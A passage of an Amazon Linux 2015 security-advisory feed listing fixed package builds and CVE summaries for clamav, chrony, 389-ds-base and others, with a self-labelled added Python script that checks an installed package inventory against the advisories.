arch="x86_64"><filename>Packages/php56-snmp-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.9" release="1.112.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-ldap-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" 
version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-mssql" 
version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-pgsql" 
version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.9-1.112.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-537</id><title>Amazon Linux AMI 2014.03 - 
ALAS-2015-537: medium priority package update for clamav</title><issued date="2015-06-02 22:23:00" /><updated date="2015-06-02 22:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2668:
ClamAV before 0.98.7 allows remote attackers to cause a denial of service (infinite loop) via a crafted xz archive file.
1217208:
CVE-2015-2668 clamav: Infinite loop condition on a crafted "xz" archive file
CVE-2015-2222:
ClamAV before 0.98.7 allows remote attackers to cause a denial of service (crash) via a crafted petite packed file.
1217207:
CVE-2015-2222 clamav: crash on crafted petite packed file
CVE-2015-2221:
ClamAV before 0.98.7 allows remote attackers to cause a denial of service (infinite loop) via a crafted y0da cryptor file.
1217206:
CVE-2015-2221 clamav: Infinite loop condition on crafted y0da cryptor file
CVE-2015-2170:
The upx decoder in ClamAV before 0.98.7 allows remote attackers to cause a denial of service (crash) via a crafted file.
1217209:
CVE-2015-2170 clamav: Crash in upx decoder with crafted file
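<!-- Added example, kept in an XML comment so the feed stays well-formed. This is not part of the Amazon Linux feed and not yum's or rpm's own code: a small consumer for the updateinfo.xml layout used above (the ALAS-2015-537 clamav entry). It parses each update element into advisory id, severity, CVE references and the fixed (epoch, version, release) per package name and arch, then reports which advisories apply to an installed inventory. SAMPLE_UPDATEINFO is a constructed, trimmed copy of two entries from this feed and INSTALLED is a constructed inventory; rpmvercmp is a reimplementation of rpm's documented version-ordering algorithm (assumption: no caret support) so the block runs without the rpm Python module.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the layout of the updateinfo.xml feed above: a trimmed
# copy of the ALAS-2015-537 clamav entry and of the ALAS-2015-540 entry, with
# the issued/updated/description elements dropped. Not the real feed.
SAMPLE_UPDATEINFO = """<updates>
<update status="final" version="1.4" type="security" from="linux-security@amazon.com">
<id>ALAS-2015-537</id>
<title>Amazon Linux AMI 2014.03 - ALAS-2015-537: medium priority package update for clamav</title>
<severity>medium</severity>
<references>
<reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2170" id="CVE-2015-2170" type="cve" />
<reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2668" id="CVE-2015-2668" type="cve" />
</references>
<pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name>
<package name="clamav" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.98.7-1.12.amzn1.x86_64.rpm</filename></package>
<package name="clamav-lib" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.98.7-1.12.amzn1.x86_64.rpm</filename></package>
</collection></pkglist>
</update>
<update status="final" version="1.4" type="security" from="linux-security@amazon.com">
<id>ALAS-2015-540</id>
<title>Amazon Linux AMI 2014.03 - ALAS-2015-540: low priority package update for libjpeg-turbo</title>
<severity>low</severity>
<references>
<reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9092" id="CVE-2014-9092" type="cve" />
</references>
<pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name>
<package name="libjpeg-turbo" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-1.2.90-5.10.amzn1.x86_64.rpm</filename></package>
</collection></pkglist>
</update>
</updates>
"""

_SEGMENT = re.compile(r"[0-9]+|[A-Za-z]+|~")


def rpmvercmp(a, b):
    """Order two RPM version (or release) strings like rpm's rpmvercmp.

    Reimplemented from the documented algorithm (assumption: the caret
    operator of newer rpm releases is not handled). Returns -1, 0 or 1.
    """
    if a == b:
        return 0
    sa, sb = _SEGMENT.findall(a), _SEGMENT.findall(b)
    i = j = 0
    while i < len(sa) or j < len(sb):
        x = sa[i] if i < len(sa) else None
        y = sb[j] if j < len(sb) else None
        # A tilde sorts before anything, including the end of the string.
        if x == "~" or y == "~":
            if x != "~":
                return 1
            if y != "~":
                return -1
            i, j = i + 1, j + 1
            continue
        # The string with segments left over is the newer one.
        if x is None:
            return -1
        if y is None:
            return 1
        if x.isdigit() and y.isdigit():
            if int(x) != int(y):
                return -1 if int(x) < int(y) else 1
        elif x.isdigit() or y.isdigit():
            # A numeric segment is newer than an alphabetic one.
            return 1 if x.isdigit() else -1
        elif x != y:
            return -1 if x < y else 1
        i, j = i + 1, j + 1
    return 0


def compare_evr(installed, candidate):
    """Compare two (epoch, version, release) tuples: epoch first, then version, then release."""
    ei, vi, ri = installed
    ec, vc, rc = candidate
    if int(ei) != int(ec):
        return -1 if int(ei) < int(ec) else 1
    c = rpmvercmp(vi, vc)
    return c if c != 0 else rpmvercmp(ri, rc)


def parse_updateinfo(xml_text):
    """Yield one dict per update element: id, severity, CVE ids and fixed EVR keyed by (name, arch)."""
    root = ET.fromstring(xml_text)
    for upd in root.iter("update"):
        yield {
            "id": upd.findtext("id"),
            "severity": upd.findtext("severity"),
            "cves": sorted(r.get("id") for r in upd.iter("reference") if r.get("type") == "cve"),
            "packages": {
                (p.get("name"), p.get("arch")): (p.get("epoch", "0"), p.get("version"), p.get("release"))
                for p in upd.iter("package")
            },
        }


# Constructed installed inventory: (name, arch) mapped to (epoch, version, release).
INSTALLED = {
    ("clamav", "x86_64"): ("0", "0.98.6", "1.11.amzn1"),        # older than the fixed build
    ("clamav-lib", "x86_64"): ("0", "0.98.7", "1.12.amzn1"),    # already at the fixed build
    ("libjpeg-turbo", "x86_64"): ("0", "1.2.90", "5.10.amzn1"), # already at the fixed build
    ("chrony", "x86_64"): ("0", "1.31", "1.12.amzn1"),          # not covered by the sample feed
}


def applicable_advisories(installed, xml_text=SAMPLE_UPDATEINFO):
    """Advisories with at least one fixed package newer than what is installed (same name and arch)."""
    hits = []
    for adv in parse_updateinfo(xml_text):
        outdated = sorted(key for key, fixed in adv["packages"].items()
                          if key in installed and compare_evr(installed[key], fixed) == -1)
        if outdated:
            hits.append((adv["id"], adv["severity"], adv["cves"], outdated))
    return hits


def advisories_for_cve(cve_id, xml_text=SAMPLE_UPDATEINFO):
    """All advisory ids referencing a CVE; one CVE can appear in several, as CVE-2014-3215 does in this feed."""
    return [adv["id"] for adv in parse_updateinfo(xml_text) if cve_id in adv["cves"]]


if __name__ == "__main__":
    for adv_id, severity, cves, pkgs in applicable_advisories(INSTALLED):
        print(f"{adv_id} [{severity}] {', '.join(cves)}: update {', '.join(n for n, _ in pkgs)}")
```

On an Amazon Linux host the same question is answered by yum itself (for example "yum updateinfo info ALAS-2015-537"), and the rpm Python bindings expose the real comparison as rpm.labelCompare; the reimplementation above exists only so the check runs offline. The CVE-keyed lookup matters because a single CVE can be fixed across several advisories in this feed, so a scanner that stops at the first match under-reports. -->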
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2170" title="" id="CVE-2015-2170" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2221" title="" id="CVE-2015-2221" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2222" title="" id="CVE-2015-2222" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2668" title="" id="CVE-2015-2668" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.98.7" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.98.7-1.12.amzn1.noarch.rpm</filename></package><package name="clamav-update" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-server-sysvinit" version="0.98.7" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-server-sysvinit-0.98.7-1.12.amzn1.noarch.rpm</filename></package><package name="clamav-scanner" version="0.98.7" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-0.98.7-1.12.amzn1.noarch.rpm</filename></package><package name="clamd" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-server" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-server-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-milter" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package 
name="clamav-milter-sysvinit" version="0.98.7" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-milter-sysvinit-0.98.7-1.12.amzn1.noarch.rpm</filename></package><package name="clamav-db" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-data-empty" version="0.98.7" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-empty-0.98.7-1.12.amzn1.noarch.rpm</filename></package><package name="clamav-data" version="0.98.7" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.98.7-1.12.amzn1.noarch.rpm</filename></package><package name="clamav-scanner-sysvinit" version="0.98.7" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-sysvinit-0.98.7-1.12.amzn1.noarch.rpm</filename></package><package name="clamav-devel" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamd" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav" version="0.98.7" release="1.12.amzn1" epoch="0" 
arch="i686"><filename>Packages/clamav-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav-server" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-server-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.98.7-1.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-538</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-538: important priority package update for 389-ds-base</title><issued date="2015-06-02 22:24:00" /><updated date="2015-06-02 22:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1854:
A flaw was found in the way Red Hat Directory Server performed authorization of modrdn operations. An unauthenticated attacker able to issue an ldapmodrdn call to the directory server could use this flaw to perform unauthorized modifications of entries in the directory server.
1209573:
CVE-2015-1854 389-ds-base: access control bypass with modrdn
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1854" title="" id="CVE-2015-1854" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.3.1-16.41.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.3.1-16.41.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.3.1-16.41.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.3.1-16.41.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.3.1-16.41.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.3.1-16.41.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.3.1-16.41.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.3.1-16.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-539</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-539: medium priority package update for chrony</title><issued date="2015-06-02 
22:25:00" /><updated date="2015-06-02 22:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1853:
1209572:
CVE-2015-1853 chrony: authentication doesn't protect symmetric associations against DoS attacks
CVE-2015-1822:
chrony before 1.31.1 does not initialize the last "next" pointer when saving unacknowledged replies to command requests, which allows remote authenticated users to cause a denial of service (uninitialized pointer dereference and daemon crash) or possibly execute arbitrary code via a large number of command requests.
1209632:
CVE-2015-1822 chrony: uninitialized pointer in cmdmon reply slots
CVE-2015-1821:
Heap-based buffer overflow in chrony before 1.31.1 allows remote authenticated users to cause a denial of service (chronyd crash) or possibly execute arbitrary code by configuring the (1) NTP or (2) cmdmon access with a subnet size that is indivisible by four and an address with a nonzero bit in the subnet remainder.
1209631:
CVE-2015-1821 chrony: Heap out of bound write in address filter
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1821" title="" id="CVE-2015-1821" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1822" title="" id="CVE-2015-1822" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1853" title="" id="CVE-2015-1853" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="chrony-debuginfo" version="1.31.1" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/chrony-debuginfo-1.31.1-1.13.amzn1.x86_64.rpm</filename></package><package name="chrony" version="1.31.1" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/chrony-1.31.1-1.13.amzn1.x86_64.rpm</filename></package><package name="chrony-debuginfo" version="1.31.1" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/chrony-debuginfo-1.31.1-1.13.amzn1.i686.rpm</filename></package><package name="chrony" version="1.31.1" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/chrony-1.31.1-1.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-540</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-540: low priority package update for libjpeg-turbo</title><issued date="2015-06-11 08:08:00" /><updated date="2015-06-11 08:09:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9092:
1169845:
CVE-2014-9092 libjpeg-turbo: denial of service via specially-crafted JPEG file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9092" title="" id="CVE-2014-9092" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libjpeg-turbo-debuginfo" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-debuginfo-1.2.90-5.10.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-devel" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-devel-1.2.90-5.10.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-utils" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-utils-1.2.90-5.10.amzn1.x86_64.rpm</filename></package><package name="turbojpeg-devel" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/turbojpeg-devel-1.2.90-5.10.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-static" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-static-1.2.90-5.10.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-1.2.90-5.10.amzn1.x86_64.rpm</filename></package><package name="turbojpeg" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/turbojpeg-1.2.90-5.10.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-static" version="1.2.90" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-static-1.2.90-5.10.amzn1.i686.rpm</filename></package><package name="turbojpeg-devel" version="1.2.90" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/turbojpeg-devel-1.2.90-5.10.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-devel" version="1.2.90" release="5.10.amzn1" epoch="0" 
arch="i686"><filename>Packages/libjpeg-turbo-devel-1.2.90-5.10.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-debuginfo" version="1.2.90" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-debuginfo-1.2.90-5.10.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-utils" version="1.2.90" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-utils-1.2.90-5.10.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo" version="1.2.90" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-1.2.90-5.10.amzn1.i686.rpm</filename></package><package name="turbojpeg" version="1.2.90" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/turbojpeg-1.2.90-5.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-541</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-541: medium priority package update for python-pip</title><issued date="2015-06-11 08:08:00" /><updated date="2015-06-11 08:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2296:
A flaw was found in the way python-requests set the domain cookie parameter for certain HTTP responses. A remote attacker could use this flaw to modify a cookie to be sent to an arbitrary URL.
1202904:
CVE-2015-2296 python-requests: session fixation and cookie stealing vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2296" title="" id="CVE-2015-2296" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-pip" version="6.1.1" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-pip-6.1.1-1.20.amzn1.noarch.rpm</filename></package><package name="python27-pip" version="6.1.1" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-pip-6.1.1-1.20.amzn1.noarch.rpm</filename></package><package name="python34-pip" version="6.1.1" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/python34-pip-6.1.1-1.20.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-542</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-542: low priority package update for e2fsprogs</title><issued date="2015-06-16 10:26:00" /><updated date="2015-06-16 11:37:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0247:
A heap-based buffer overflow flaw was found in e2fsprogs. A specially crafted Ext2/3/4 file system could cause an application using the ext2fs library (for example, fsck) to crash or, possibly, execute arbitrary code.
1187032:
CVE-2015-0247 e2fsprogs: ext2fs_open2() missing first_meta_bg boundary check leading to heap buffer overflow (oCERT-015-002)
